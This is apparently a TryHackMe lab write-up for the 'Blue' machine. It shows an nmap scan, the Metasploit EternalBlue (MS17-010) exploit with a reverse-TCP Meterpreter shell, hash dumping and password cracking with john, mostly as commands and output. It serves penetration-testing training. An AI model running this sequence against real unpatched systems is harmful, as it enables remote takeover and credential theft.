Table of contents
Blue is the second machine in TryHackMe’s “Offensive pentesting” path.
Enumeration
We will start with nmap
scan on the target:
nmap nmap -sV -vv --script vuln 10.10.221.153
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49159/tcp open msrpc syn-ack Microsoft Windows RPC
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
This machine is vulnerable to the smb-vuln-ms17-010
exploit, known in media as EternalBlue
.
It can be done without Metasploit
, of course, but it will be time-consuming.
I’ll probably describe non-metasploit method next time.
Exploitation
Run Metasploit
:
msfconsole
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Adapter names can be used for IP params set LHOST eth0
Set up the exploit:
msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
It should be fine as it is, but you also might need to change the LPORT
too. Hit run
:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
The process of migrating the shell is well described in the official material, but I didn’t have any issue with the shell as it is.
Post Exploitation
As the shell is already running as NT AUTHORITY\SYSTEM
we don’t need to do a PrivEsc. However, you might collect some useful data from the compromised machine. Most OSCP lab machines have something juicy to find if you become a root. Don’t skip the enumeration! To grab users' hashes, we can use hashdump
command:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
We have a hash now! Let’s crack it. Save the hash into the file (jon.hash
in my case) and crack it with john
:
/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash
Yay! We have Jon’s password now.
Capturing flags
Well, the exercise is explicitly asking you to submit flags, but don’t think of them as a CTF flag. A flag in a good CTF is located in a place where you can’t reach it without going the extra mile. There are three flags in this machine, and they are placed in quite sensitive places:
- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents
That makes sense. System32/config/ is the place where SAM files are located, Jon
is the admin, so something helpful might be found in the Documents
folder, etc.
Takeaway
Exploits rarely work fine out of the box. You might need a lot of patience to make it work sometimes.
Not all exploits (especially if we’re talking about kernel exploits) are stable. You might need to restart this box a bunch of times.
Metasploit
doesn’t always mean that your exploitation phase will go smoothly.The post exploitation phase is important.